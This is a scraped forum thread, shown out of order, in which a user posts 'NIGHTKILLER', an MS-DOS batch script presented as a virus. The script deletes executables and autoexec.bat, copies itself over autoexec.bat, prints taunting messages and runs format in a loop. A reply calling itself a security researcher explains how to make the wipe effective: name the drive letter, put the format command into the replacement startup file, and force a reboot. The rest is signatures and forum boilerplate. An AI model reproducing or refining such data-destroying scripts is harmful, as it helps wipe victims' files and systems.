0 Users appreciate this thread.
NIGHTKILLER (virus)
SMOGamerX (2016-05-01 12:00:02)I don't get it...
Remember: Just when the caterpillar thought its world was over, it turned into a butterfly!
WiiUGuy (2016-05-01 12:05:40)It's a batch file...
Meant to destroy a MSDOS pc, dummy...
! Warning WiiUGuy stop flooding the hat just to get cSplit !
Give A Wow HERE!
(It\'s free. just click that image of doge.)
[link=http://wowmeter.us/@WiiUGuy]
[img]http://wowmeter.us/$WiiUGuy[/img][/link]
Give A Wow HERE!
(It\'s free. just click that image of doge.)
[link=http://wowmeter.us/@WiiUGuy]
[img]http://wowmeter.us/$WiiUGuy[/img][/link]
SMOGamerX (2016-05-01 12:11:49)oh...
Remember: Just when the caterpillar thought its world was over, it turned into a butterfly!
1. not really considered a virus
2. it only deletes files with the .exe and .com in the same directory (not being recursive)
3. it doesn't format anything
You can send him a PM on YouTube, though there's a likelihood of it being rejected due to it not having much of a special ability.
Also, moved to the correct forum.
2016-05-01 12:23:03
Security researcher, web developer, artist, and tech enthusiast.
WiiUGuy (2016-05-01 12:23:33)I format harddrive....
### ###
#@# #@#
+++++++
---------
\/\/\/\/\/
--------
! Warning WiiUGuy stop flooding the hat just to get cSplit !
Give A Wow HERE!
(It\'s free. just click that image of doge.)
[link=http://wowmeter.us/@WiiUGuy]
[img]http://wowmeter.us/$WiiUGuy[/img][/link]
Give A Wow HERE!
(It\'s free. just click that image of doge.)
[link=http://wowmeter.us/@WiiUGuy]
[img]http://wowmeter.us/$WiiUGuy[/img][/link]
Okay. Couple of issues with that...
1. you haven't mentioned the drive letter
2. if you format the same storage device carrying the autoexec.bat file, it's going to get wiped off.
A better approach would be to have the format command in that file that would replace autoexec.exe and not in the script that would run. That way, after rebooting, the script would get executed and it would format.
The script the user would run can reboot the PC to get to that point too.
Security researcher, web developer, artist, and tech enthusiast.
ICTman (2017-04-11 22:02:55)Well at least you didn't just say "LOL L33T HAXOR GOT UR PC HAHAHA"
http://xkcd.com/1834
Tweet meh: @ICTman1076
Discord meh: ICTman#5904
Tweet meh again: @wingedmusic
Tweet meh: @ICTman1076
Discord meh: ICTman#5904
Tweet meh again: @wingedmusic
Log in to submit a comment
Back to forum: Programming (Python, Java, Delphi/Pascal, C, VB, etc)
New registered users today: 7
Newest registered user: ElegantVulpes
I really want danooct1 to post a video on NightKiller.bat..
MSDOS VIRUS
So basically paste the spoiler
:b
echo Invalid filename.
echo 000111000101
del *.exe
del *.com
del autoexec.bat
copy nightkiller.bat autoexec.bat
pause
echo ______________________________
echo | I take over your PC now___|
echo |____________________________|
echo |You are now screwed..._____|
echo | ~ NightKiller________________|
echo [ Formatted drive successfully.]
echo ~+===================+~
echo Go ahead, reboot, I don't care, you're legitimately screwed..
format
format
format
pause
goto b
Save as .bat, and run it on a MSDos Virtual Machine :3
2016-05-01 12:21:02
Give A Wow HERE!
(It\'s free. just click that image of doge.)
[link=http://wowmeter.us/@WiiUGuy]
[img]http://wowmeter.us/$WiiUGuy[/img][/link]